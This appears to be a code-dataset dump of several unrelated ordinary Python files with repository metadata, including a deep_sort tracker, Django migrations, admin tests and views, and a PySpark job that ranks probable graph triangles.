cat_in_snow: (213, 320, 3),
williamsburg_bridge: (239, 194),
}
_tfrecord_filepath = os.path.join(
self._test_dir,
'test.tfrecord')
with tf.python_io.TFRecordWriter(_tfrecord_filepath) as writer:
for image_path, label in _toy_image_labels_valid.items():
with open(image_path, 'rb') as fid:
image_data = fid.read()
image_shape = _toy_image_shapes[image_path]
tf_example = _image_example(image_data, image_shape, label)
writer.write(tf_example.SerializeToString())
single_data = {
'height': image_shape[0],
'width': image_shape[1],
'shape': image_shape,
'label': label,
'image_raw': image_data,
'variable1': "1234567890",
'variable2': int(9876543210),
}
for key, value in single_data.items():
self._dataset_valid[key].append(value)
self._hparams = {
"num_epochs": 1,
"batch_size": 1,
"shuffle": False,
"dataset": {
"files": _tfrecord_filepath,
"feature_original_types": _feature_original_types,
"feature_convert_types": self._feature_convert_types,
"image_options": [_image_options],
}
}
def tearDown(self):
shutil.rmtree(self._test_dir)
def _run_and_test(self, hparams):
tfrecord_data = tx.data.TFRecordData(hparams)
iterator = tfrecord_data.dataset.make_initializable_iterator()
data_batch = iterator.get_next()
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
sess.run(tf.tables_initializer())
sess.run(iterator.initializer)
i = 0
def _prod(lst):
res = 1
for i in lst:
res *= i
return res
while True:
try:
data_batch_ = sess.run(data_batch)
self.assertEqual(
set(data_batch_.keys()),
set(tfrecord_data.list_items()))
for key in self._unconvert_features:
value = data_batch_[key][0]
self.assertEqual(value, self._dataset_valid[key][i])
self.assertEqual(
list(data_batch_['shape'].values),
list(self._dataset_valid['shape'][i]))
for key, item in self._feature_convert_types.items():
value = data_batch_[key][0]
if item == 'tf.string' or item is tf.string:
self.assertTrue(isinstance(value, bytes))
else:
dtype_matched = (
tx.utils.dtypes.get_tf_dtype(str(value.dtype))
is tx.utils.dtypes.get_tf_dtype(item))
self.assertTrue(dtype_matched)
if hparams["dataset"].get("image_options"):
image_options = hparams["dataset"].get("image_options")
if isinstance(image_options, dict):
image_options = [image_options]
for image_option_feature in image_options:
image_key = image_option_feature.get(
"image_feature_name")
if image_key is None:
continue
image_gen = data_batch_[image_key][0]
image_valid_shape = self._dataset_valid["shape"][i]
resize_height = image_option_feature.get(
"resize_height")
resize_width = image_option_feature.get(
"resize_width")
if resize_height and resize_width:
self.assertEqual(
image_gen.shape[0] * image_gen.shape[1],
resize_height * resize_width)
else:
self.assertEqual(
_prod(image_gen.shape),
_prod(image_valid_shape))
i += 1
except tf.errors.OutOfRangeError:
print('Done -- epoch limit reached')
break
def test_default_setting(self):
self._run_and_test(self._hparams)
def test_image_resize(self):
hparams = copy.copy(self._hparams)
_image_options = {
'image_feature_name': 'image_raw',
'resize_height': 512,
'resize_width': 512,
}
hparams["dataset"].update({"image_options": _image_options})
self._run_and_test(hparams)
if __name__ == "__main__":
tf.test.main()
| true
| true
|
f7079e7234b39fe9146d60409999798817582d7d
| 566
|
py
|
Python
|
PythonBasics/NestedLoops/Exercise/train_trainers.py
|
achoraev/SoftUni
|
0cc7db470a096cc33bbe0ca6bd90060b79120573
|
[
"Apache-2.0"
] | null | null | null |
PythonBasics/NestedLoops/Exercise/train_trainers.py
|
achoraev/SoftUni
|
0cc7db470a096cc33bbe0ca6bd90060b79120573
|
[
"Apache-2.0"
] | null | null | null |
PythonBasics/NestedLoops/Exercise/train_trainers.py
|
achoraev/SoftUni
|
0cc7db470a096cc33bbe0ca6bd90060b79120573
|
[
"Apache-2.0"
] | null | null | null |
people = int(input())
presentation = ""
total_score = 0
total_average = 0
count_presentation = 0
while True:
command = input()
if command == "Finish":
break
presentation = command
score = 0
count_presentation += 1
for i in range(0, people):
score += float(input())
average_score = score / people
total_score += average_score
print(f"{presentation} - {average_score:.2f}.")
total_average = total_score / count_presentation
print(f"Student's final assessment is {total_average:.2f}.")
| 21.769231
| 61
| 0.632509
|
people = int(input())
presentation = ""
total_score = 0
total_average = 0
count_presentation = 0
while True:
command = input()
if command == "Finish":
break
presentation = command
score = 0
count_presentation += 1
for i in range(0, people):
score += float(input())
average_score = score / people
total_score += average_score
print(f"{presentation} - {average_score:.2f}.")
total_average = total_score / count_presentation
print(f"Student's final assessment is {total_average:.2f}.")
| true
| true
|
f7079eef1bd564c94d8e1deac535192b60d263c4
| 481
|
py
|
Python
|
liveapp/loadtowns.py
|
derrick-gopher/livestockapp
|
87d4b0a697e0c47e64d419c61141b9fe04dbf088
|
[
"MIT"
] | 1
|
2018-05-22T18:42:58.000Z
|
2018-05-22T18:42:58.000Z
|
liveapp/loadtowns.py
|
muriithiderro/livestockapp
|
87d4b0a697e0c47e64d419c61141b9fe04dbf088
|
[
"MIT"
] | 7
|
2020-06-05T17:45:19.000Z
|
2022-01-13T00:41:59.000Z
|
liveapp/loadtowns.py
|
muriithiderro/livestockapp
|
87d4b0a697e0c47e64d419c61141b9fe04dbf088
|
[
"MIT"
] | 1
|
2020-01-12T21:09:51.000Z
|
2020-01-12T21:09:51.000Z
|
import os
from django.contrib.gis.utils import LayerMapping
from liveapp.models import Town
town_mapping = {
'town_name': 'Town_Name',
'town_type': 'Town_Type',
'geom': 'MULTIPOINT',
}
town_shp = os.path.abspath(os.path.join(os.path.dirname(__file__), 'data/subcounty', 'towns.shp'),)
def run(verbose=True):
lm = LayerMapping(
Town, town_shp, town_mapping,
transform=False, encoding='iso-8859-1',
)
lm.save(strict=True, verbose=verbose)
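# Usage sketch: run() follows the django-extensions runscript convention, so
# assuming that app is installed and data/subcounty/towns.shp is present,
# the import would typically be triggered with:
#
#   python manage.py runscript loadtowns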
| 24.05
| 99
| 0.681913
|
import os
from django.contrib.gis.utils import LayerMapping
from liveapp.models import Town
town_mapping = {
'town_name': 'Town_Name',
'town_type': 'Town_Type',
'geom': 'MULTIPOINT',
}
town_shp = os.path.abspath(os.path.join(os.path.dirname(__file__), 'data/subcounty', 'towns.shp'),)
def run(verbose=True):
lm = LayerMapping(
Town, town_shp, town_mapping,
transform=False, encoding='iso-8859-1',
)
lm.save(strict=True, verbose=verbose)
| true
| true
|
f7079f6f7700b22cd843843d2cee903b1f3ed3c2
| 295
|
py
|
Python
|
straitlets/dispatch.py
|
quantopian/serializable-traitlets
|
f7de75507978e08446a15894a8417997940ea7a6
|
[
"Apache-2.0"
] | 13
|
2016-01-27T01:55:18.000Z
|
2022-02-10T12:09:46.000Z
|
straitlets/dispatch.py
|
quantopian/serializable-traitlets
|
f7de75507978e08446a15894a8417997940ea7a6
|
[
"Apache-2.0"
] | 5
|
2016-02-17T13:52:50.000Z
|
2018-12-13T21:30:26.000Z
|
straitlets/dispatch.py
|
quantopian/serializable-traitlets
|
f7de75507978e08446a15894a8417997940ea7a6
|
[
"Apache-2.0"
] | 10
|
2017-07-21T14:27:17.000Z
|
2022-03-16T11:19:47.000Z
|
"""
Python < 3.4 compat for singledispatch.
"""
from sys import version_info
if (version_info.major, version_info.minor) < (3, 4): # pragma: no cover
from singledispatch import singledispatch
else: # pragma: no cover
from functools import singledispatch
__all__ = ['singledispatch']
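# Minimal usage sketch of the re-exported name (works on both branches):
#
#   from straitlets.dispatch import singledispatch
#
#   @singledispatch
#   def describe(obj):
#       return 'object'
#
#   @describe.register(int)
#   def _(obj):
#       return 'int'
#
#   describe(1)    # -> 'int'
#   describe('x')  # -> 'object'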
| 26.818182
| 73
| 0.732203
|
from sys import version_info
if (version_info.major, version_info.minor) < (3, 4):
    from singledispatch import singledispatch
else:
    from functools import singledispatch
__all__ = ['singledispatch']
| true
| true
|
f707a04c0a3ba2c575c9cf5566717a283e97e9d4
| 5,489
|
py
|
Python
|
deep_sort/sort/tracker.py
|
Jeasonlee313/paperdev_Phy_SORT-
|
24c9ee5d3fc18ed6d3d85e4f95195d39bdf527e2
|
[
"MIT"
] | null | null | null |
deep_sort/sort/tracker.py
|
Jeasonlee313/paperdev_Phy_SORT-
|
24c9ee5d3fc18ed6d3d85e4f95195d39bdf527e2
|
[
"MIT"
] | null | null | null |
deep_sort/sort/tracker.py
|
Jeasonlee313/paperdev_Phy_SORT-
|
24c9ee5d3fc18ed6d3d85e4f95195d39bdf527e2
|
[
"MIT"
] | null | null | null |
# vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from . import kalman_filter
from . import linear_assignment
from . import iou_matching
from .track import Track
class Tracker:
"""
This is the multi-target tracker.
Parameters
----------
metric : nn_matching.NearestNeighborDistanceMetric
A distance metric for measurement-to-track association.
max_age : int
        Maximum number of consecutive misses before a track is deleted.
n_init : int
Number of consecutive detections before the track is confirmed. The
track state is set to `Deleted` if a miss occurs within the first
`n_init` frames.
Attributes
----------
metric : nn_matching.NearestNeighborDistanceMetric
The distance metric used for measurement to track association.
max_age : int
        Maximum number of consecutive misses before a track is deleted.
n_init : int
Number of frames that a track remains in initialization phase.
kf : kalman_filter.KalmanFilter
A Kalman filter to filter target trajectories in image space.
tracks : List[Track]
The list of active tracks at the current time step.
"""
def __init__(self, metric, max_iou_distance=0.7, max_age=70, n_init=3, h = np.identity(3, float)):
self.metric = metric
self.max_iou_distance = max_iou_distance
self.max_age = max_age
self.n_init = n_init
self.kf = kalman_filter.KalmanFilter()
self.tracks = []
self._next_id = 1
self.H = h
def predict(self):
"""Propagate track state distributions one time step forward.
This function should be called once every time step, before `update`.
"""
for track in self.tracks:
track.predict(self.kf)
def update(self, detections, h=np.identity(3)):
"""Perform measurement update and track management.
Parameters
----------
detections : List[deep_sort.detection.Detection]
A list of detections at the current time step.
"""
# Run matching cascade.
matches, unmatched_tracks, unmatched_detections = \
self._match(detections)
# Update track set.
for track_idx, detection_idx in matches:
self.tracks[track_idx].update(
self.kf, detections[detection_idx])
for track_idx in unmatched_tracks:
self.tracks[track_idx].mark_missed()
for detection_idx in unmatched_detections:
self._initiate_track(detections[detection_idx])
self.tracks = [t for t in self.tracks if not t.is_deleted()]
# Update distance metric.
active_targets = [t.track_id for t in self.tracks if t.is_confirmed()]
features, targets = [], []
for track in self.tracks:
if not track.is_confirmed():
continue
features += track.features
targets += [track.track_id for _ in track.features]
track.features = []
self.metric.partial_fit(
np.asarray(features), np.asarray(targets), active_targets)
def _match(self, detections):
def gated_metric(tracks, dets, track_indices, detection_indices):
features = np.array([dets[i].feature for i in detection_indices])
targets = np.array([tracks[i].track_id for i in track_indices])
cost_matrix = self.metric.distance(features, targets)
print("cost_matrix1:\n", cost_matrix)
cost_matrix = linear_assignment.gate_cost_matrix(
self.kf, cost_matrix, tracks, dets, track_indices,
detection_indices, only_position=True)
print("cost_matrix2:\n", cost_matrix)
return cost_matrix
# Split track set into confirmed and unconfirmed tracks.
confirmed_tracks = [
i for i, t in enumerate(self.tracks) if t.is_confirmed()]
unconfirmed_tracks = [
i for i, t in enumerate(self.tracks) if not t.is_confirmed()]
# Associate confirmed tracks using appearance features.
matches_a, unmatched_tracks_a, unmatched_detections = \
linear_assignment.matching_cascade(
gated_metric, self.metric.matching_threshold, self.max_age,
self.tracks, detections, confirmed_tracks)
# Associate remaining tracks together with unconfirmed tracks using IOU.
iou_track_candidates = unconfirmed_tracks + [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update == 1]
unmatched_tracks_a = [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update != 1]
matches_b, unmatched_tracks_b, unmatched_detections = \
linear_assignment.min_cost_matching(
iou_matching.iou_cost, self.max_iou_distance, self.tracks,
detections, iou_track_candidates, unmatched_detections)
matches = matches_a + matches_b
unmatched_tracks = list(set(unmatched_tracks_a + unmatched_tracks_b))
return matches, unmatched_tracks, unmatched_detections
def _initiate_track(self, detection):
mean, covariance = self.kf.initiate(detection.to_toppoint())
self.tracks.append(Track(
mean, covariance, self._next_id, self.n_init, self.max_age,
detection.feature, h=self.H))
self._next_id += 1
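# Per-frame driver sketch (the metric and Detection objects are assumed to
# come from the surrounding deep_sort package, e.g. nn_matching):
#
#   tracker = Tracker(metric)
#   for detections in detections_per_frame:
#       tracker.predict()
#       tracker.update(detections)
#       confirmed = [t.track_id for t in tracker.tracks if t.is_confirmed()]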
| 38.65493
| 102
| 0.647841
|
from __future__ import absolute_import
import numpy as np
from . import kalman_filter
from . import linear_assignment
from . import iou_matching
from .track import Track
class Tracker:
def __init__(self, metric, max_iou_distance=0.7, max_age=70, n_init=3, h = np.identity(3, float)):
self.metric = metric
self.max_iou_distance = max_iou_distance
self.max_age = max_age
self.n_init = n_init
self.kf = kalman_filter.KalmanFilter()
self.tracks = []
self._next_id = 1
self.H = h
def predict(self):
for track in self.tracks:
track.predict(self.kf)
def update(self, detections, h=np.identity(3)):
matches, unmatched_tracks, unmatched_detections = \
self._match(detections)
for track_idx, detection_idx in matches:
self.tracks[track_idx].update(
self.kf, detections[detection_idx])
for track_idx in unmatched_tracks:
self.tracks[track_idx].mark_missed()
for detection_idx in unmatched_detections:
self._initiate_track(detections[detection_idx])
self.tracks = [t for t in self.tracks if not t.is_deleted()]
active_targets = [t.track_id for t in self.tracks if t.is_confirmed()]
features, targets = [], []
for track in self.tracks:
if not track.is_confirmed():
continue
features += track.features
targets += [track.track_id for _ in track.features]
track.features = []
self.metric.partial_fit(
np.asarray(features), np.asarray(targets), active_targets)
def _match(self, detections):
def gated_metric(tracks, dets, track_indices, detection_indices):
features = np.array([dets[i].feature for i in detection_indices])
targets = np.array([tracks[i].track_id for i in track_indices])
cost_matrix = self.metric.distance(features, targets)
print("cost_matrix1:\n", cost_matrix)
cost_matrix = linear_assignment.gate_cost_matrix(
self.kf, cost_matrix, tracks, dets, track_indices,
detection_indices, only_position=True)
print("cost_matrix2:\n", cost_matrix)
return cost_matrix
confirmed_tracks = [
i for i, t in enumerate(self.tracks) if t.is_confirmed()]
unconfirmed_tracks = [
i for i, t in enumerate(self.tracks) if not t.is_confirmed()]
matches_a, unmatched_tracks_a, unmatched_detections = \
linear_assignment.matching_cascade(
gated_metric, self.metric.matching_threshold, self.max_age,
self.tracks, detections, confirmed_tracks)
iou_track_candidates = unconfirmed_tracks + [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update == 1]
unmatched_tracks_a = [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update != 1]
matches_b, unmatched_tracks_b, unmatched_detections = \
linear_assignment.min_cost_matching(
iou_matching.iou_cost, self.max_iou_distance, self.tracks,
detections, iou_track_candidates, unmatched_detections)
matches = matches_a + matches_b
unmatched_tracks = list(set(unmatched_tracks_a + unmatched_tracks_b))
return matches, unmatched_tracks, unmatched_detections
def _initiate_track(self, detection):
mean, covariance = self.kf.initiate(detection.to_toppoint())
self.tracks.append(Track(
mean, covariance, self._next_id, self.n_init, self.max_age,
detection.feature, h=self.H))
self._next_id += 1
| true
| true
|
f707a053e9f789fbed38ab5f7888a21ba291fcc5
| 1,142
|
py
|
Python
|
crewbank/contrib/sites/migrations/0003_set_site_domain_and_name.py
|
mfwarren/CrewBank
|
3f66ca147aef3c589e9c99a33747f1060e4f2d48
|
[
"MIT"
] | 1
|
2017-09-27T19:31:33.000Z
|
2017-09-27T19:31:33.000Z
|
crewbank/contrib/sites/migrations/0003_set_site_domain_and_name.py
|
mfwarren/CrewBank
|
3f66ca147aef3c589e9c99a33747f1060e4f2d48
|
[
"MIT"
] | null | null | null |
crewbank/contrib/sites/migrations/0003_set_site_domain_and_name.py
|
mfwarren/CrewBank
|
3f66ca147aef3c589e9c99a33747f1060e4f2d48
|
[
"MIT"
] | null | null | null |
"""
To understand why this file is here, please read:
http://cookiecutter-django.readthedocs.io/en/latest/faq.html#why-is-there-a-django-contrib-sites-directory-in-cookiecutter-django
"""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'crewbank.io',
'name': 'CrewBank'
}
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'example.com',
'name': 'example.com'
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
| 24.297872
| 129
| 0.644483
|
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'crewbank.io',
'name': 'CrewBank'
}
)
def update_site_backward(apps, schema_editor):
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'example.com',
'name': 'example.com'
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
| true
| true
|
f707a13f011a146ede9e74be4a032cc3cf065b90
| 1,296
|
py
|
Python
|
app/core/tests/test_admin.py
|
anamgajith/recipe-app-api
|
0624c3b5c5c3a559338af3623cf015f70f6a1ae0
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
anamgajith/recipe-app-api
|
0624c3b5c5c3a559338af3623cf015f70f6a1ae0
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
anamgajith/recipe-app-api
|
0624c3b5c5c3a559338af3623cf015f70f6a1ae0
|
[
"MIT"
] | null | null | null |
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@test.com",
password="test123"
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@test.com",
password="test123",
name="Test User"
)
def test_users_listed(self):
"""Test if the user listed on the user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 32.4
| 68
| 0.635802
|
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@test.com",
password="test123"
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@test.com",
password="test123",
name="Test User"
)
def test_users_listed(self):
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| true
| true
|
f707a156552ddcfec82940e0985328a092287f89
| 239
|
py
|
Python
|
login/views.py
|
techonerd/Social-Connect
|
cde7107cbe6720291a0d47ec96f48a6619396934
|
[
"Apache-2.0"
] | null | null | null |
login/views.py
|
techonerd/Social-Connect
|
cde7107cbe6720291a0d47ec96f48a6619396934
|
[
"Apache-2.0"
] | 1
|
2021-12-23T00:09:12.000Z
|
2021-12-23T00:09:12.000Z
|
login/views.py
|
techonerd/Social-Connect
|
cde7107cbe6720291a0d47ec96f48a6619396934
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
def index(request):
# return HttpResponse("Hello, world. You're at the polls index.")
return render(request, 'login/index.html')
| 26.555556
| 69
| 0.74477
|
from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return render(request, 'login/index.html')
| true
| true
|
f707a15fb2b735f5f3a39861cca6ed24348a8788
| 305
|
py
|
Python
|
lambda_utils/response_handlers/__init__.py
|
Christoph-Schabert/lambda-utils
|
2d9628df4e10190bb5f50b3ca3910b5d2743e060
|
[
"MIT"
] | 2
|
2017-02-12T19:40:36.000Z
|
2017-06-23T07:47:18.000Z
|
lambda_utils/response_handlers/__init__.py
|
Christoph-Schabert/lambda-utils
|
2d9628df4e10190bb5f50b3ca3910b5d2743e060
|
[
"MIT"
] | 353
|
2017-02-12T18:34:18.000Z
|
2019-04-03T17:47:36.000Z
|
lambda_utils/response_handlers/__init__.py
|
Christoph-Schabert/lambda-utils
|
2d9628df4e10190bb5f50b3ca3910b5d2743e060
|
[
"MIT"
] | 1
|
2017-12-08T12:14:23.000Z
|
2017-12-08T12:14:23.000Z
|
import logging
class BaseResponseHandler:
def on_execution(self, event):
logging.debug(event)
return event
def on_exception(self, ex):
logging.exception(str(ex))
raise
def on_response(self, response):
logging.debug(response)
return response
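# Subclass sketch (hypothetical): a handler can shape a Lambda-style response
# while inheriting the logging behaviour above, e.g.
#
#   import json
#
#   class JsonResponseHandler(BaseResponseHandler):
#       def on_response(self, response):
#           response = super(JsonResponseHandler, self).on_response(response)
#           return {'statusCode': 200, 'body': json.dumps(response)}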
| 19.0625
| 36
| 0.642623
|
import logging
class BaseResponseHandler:
def on_execution(self, event):
logging.debug(event)
return event
def on_exception(self, ex):
logging.exception(str(ex))
raise
def on_response(self, response):
logging.debug(response)
return response
| true
| true
|
f707a2a773eb93042cddc4014578334f97a08dbd
| 4,750
|
py
|
Python
|
src/rdd_bs.py
|
papaemman/Mining-of-Massive-Datasets-AUTh
|
99a92e133bb21e4a86e9f7b3b704d258007d5f15
|
[
"MIT"
] | null | null | null |
src/rdd_bs.py
|
papaemman/Mining-of-Massive-Datasets-AUTh
|
99a92e133bb21e4a86e9f7b3b704d258007d5f15
|
[
"MIT"
] | null | null | null |
src/rdd_bs.py
|
papaemman/Mining-of-Massive-Datasets-AUTh
|
99a92e133bb21e4a86e9f7b3b704d258007d5f15
|
[
"MIT"
] | 2
|
2021-08-31T20:29:22.000Z
|
2021-10-01T10:20:16.000Z
|
from pyspark import SparkContext
import sys
import time
# Put node with smaller id as src of edge and node with bigger id as dst.
def reOrderingSrcAndDstOfEgde(x:list)-> tuple:
src = x[0]
dst = x[1]
probability = x[2]
if src < dst:
return (src,(dst,probability))
else:
return (dst,(src,probability))
# Find which edges must exist to create triangles with a specific node as base.
# Also returns all the already existing edges.
def findEdgesToSearchToCalculateAllTriangles(node:str, listOfEdges:list)-> list:
listOfEdges.sort(key= lambda x: x[0])
edgesToSearchAndEdgesThatExist = list()
for index,edge in enumerate(listOfEdges):
dstNode = edge[0]
edge_probability = edge[1]
        edgesToSearchAndEdgesThatExist.append( ((node,dstNode), (edge_probability,"-1")) ) # The edges that already exist. The "-1" is a flag that shows that this edge exists
        for edge2 in listOfEdges[index + 1:]: # Calculate all the edges that are needed to create triangles with this node as base
            # The value "X" is a dummy and is needed in order to have the same structure in all key-value pairs
# The node in the key-value pair shows which node needs this edge to create a triangle
edgesToSearchAndEdgesThatExist.append( ((dstNode,edge2[0]), ("X",node)) )
return edgesToSearchAndEdgesThatExist
# Returns the searched edges that exist to the nodes that need them to form triangles.
# Also returns each existing edge to the node from which it was extracted.
def returnTheSearchedEdgesThatExist(edge:tuple, listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles:list)-> tuple:
    listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles.sort(key= lambda x: x[1]) # put the key-value pair that shows whether the edge exists first in the list
edgesToReturn = list()
    if listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][1] == "-1": # Edge exists in the graph
edgeProbability = listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][0]
edgesToReturn.append( (edge[0],(edge,edgeProbability)) )
for keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle in listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[1:]:
edgesToReturn.append( (keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle[1], (edge,edgeProbability)) )
return edgesToReturn
else: # Edge doesn't exist in the graph
return edgesToReturn # edgesToReturn = []
# Finds the triangles that exist with a node as base, and their probabilities
def calculateTriangles(node, listOfEdges:list)-> list:
listOfEdges.sort(reverse=True,key= lambda x: x[0][0])
edges_dic = dict((key,value) for key, value in listOfEdges)
trianglesThatExist = list()
for edge1 in listOfEdges:
        if edge1[0][0] > node: # a triangle exists with this node as base
edge2 = (node,edge1[0][0])
edge3 = (node,edge1[0][1])
triangleName = node + "," + edge1[0][0] + "," + edge1[0][1]
triangleProbability = float(edges_dic[edge1[0]]) * float(edges_dic[edge2]) * float(edges_dic[edge3])
trianglesThatExist.append((triangleName,triangleProbability))
        else: # no triangle exists with this node as base
break
return trianglesThatExist
def main(TopK:str):
sc = SparkContext(appName="Top-k most probable triangles")
# edgesRDD = sc.textFile("./input/ex.csv")
# edgesRDD = sc.textFile("./input/collins.csv")
# edgesRDD = sc.textFile("./input/ex_exploit_bug.csv")
edgesRDD = sc.textFile("./input/artists_uniform.csv")
# artists_uniform.csv, artists_normal.csv, artists_power_law.csv
trianglesRDD = edgesRDD \
.map(lambda x: x.split(",")) \
.map(lambda x: reOrderingSrcAndDstOfEgde(x)) \
.groupByKey() \
.flatMap(lambda x: findEdgesToSearchToCalculateAllTriangles(x[0],list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: returnTheSearchedEdgesThatExist(x[0], list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: calculateTriangles(x[0], list(x[1]))) \
.sortBy(lambda x: x[1], ascending=False) \
.take(int(TopK))
# .count()
# print(trianglesRDD)
# for triangle in trianglesRDD:
# print(triangle)
sc.stop()
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Give k as input")
sys.exit()
start = time.time()
main(sys.argv[1])
end = time.time()
print("Execution time : " + str(end - start))
| 42.410714
| 172
| 0.666316
|
from pyspark import SparkContext
import sys
import time
def reOrderingSrcAndDstOfEgde(x:list)-> tuple:
src = x[0]
dst = x[1]
probability = x[2]
if src < dst:
return (src,(dst,probability))
else:
return (dst,(src,probability))
def findEdgesToSearchToCalculateAllTriangles(node:str, listOfEdges:list)-> list:
listOfEdges.sort(key= lambda x: x[0])
edgesToSearchAndEdgesThatExist = list()
for index,edge in enumerate(listOfEdges):
dstNode = edge[0]
edge_probability = edge[1]
        edgesToSearchAndEdgesThatExist.append( ((node,dstNode), (edge_probability,"-1")) )
        for edge2 in listOfEdges[index + 1:]:
            edgesToSearchAndEdgesThatExist.append( ((dstNode,edge2[0]), ("X",node)) )
return edgesToSearchAndEdgesThatExist
def returnTheSearchedEdgesThatExist(edge:tuple, listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles:list)-> tuple:
    listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles.sort(key= lambda x: x[1])
    edgesToReturn = list()
    if listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][1] == "-1":
        edgeProbability = listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][0]
edgesToReturn.append( (edge[0],(edge,edgeProbability)) )
for keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle in listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[1:]:
edgesToReturn.append( (keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle[1], (edge,edgeProbability)) )
return edgesToReturn
    else:
        return edgesToReturn # edgesToReturn = []
# Finds the triangles that exist with a given node as basis, and their probabilities
def calculateTriangles(node, listOfEdges:list)-> list:
listOfEdges.sort(reverse=True,key= lambda x: x[0][0])
edges_dic = dict((key,value) for key, value in listOfEdges)
trianglesThatExist = list()
for edge1 in listOfEdges:
        if edge1[0][0] > node: # a triangle exists with this node as basis
edge2 = (node,edge1[0][0])
edge3 = (node,edge1[0][1])
triangleName = node + "," + edge1[0][0] + "," + edge1[0][1]
triangleProbability = float(edges_dic[edge1[0]]) * float(edges_dic[edge2]) * float(edges_dic[edge3])
trianglesThatExist.append((triangleName,triangleProbability))
        else: # no triangle exists with this node as basis
break
return trianglesThatExist
def main(TopK:str):
sc = SparkContext(appName="Top-k most probable triangles")
# edgesRDD = sc.textFile("./input/ex.csv")
# edgesRDD = sc.textFile("./input/collins.csv")
# edgesRDD = sc.textFile("./input/ex_exploit_bug.csv")
edgesRDD = sc.textFile("./input/artists_uniform.csv")
# artists_uniform.csv, artists_normal.csv, artists_power_law.csv
trianglesRDD = edgesRDD \
.map(lambda x: x.split(",")) \
.map(lambda x: reOrderingSrcAndDstOfEgde(x)) \
.groupByKey() \
.flatMap(lambda x: findEdgesToSearchToCalculateAllTriangles(x[0],list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: returnTheSearchedEdgesThatExist(x[0], list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: calculateTriangles(x[0], list(x[1]))) \
.sortBy(lambda x: x[1], ascending=False) \
.take(int(TopK))
# .count()
# print(trianglesRDD)
# for triangle in trianglesRDD:
# print(triangle)
sc.stop()
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Give k as input")
sys.exit()
start = time.time()
main(sys.argv[1])
end = time.time()
print("Execution time : " + str(end - start))
| true
| true
|
f707a2cda281657a347a6780a6cd2b1bcc1cb279
| 1,786
|
py
|
Python
|
venv/lib/python3.6/site-packages/wtforms/ext/csrf/form.py
|
aitoehigie/britecore_flask
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
[
"MIT"
] | null | null | null |
venv/lib/python3.6/site-packages/wtforms/ext/csrf/form.py
|
aitoehigie/britecore_flask
|
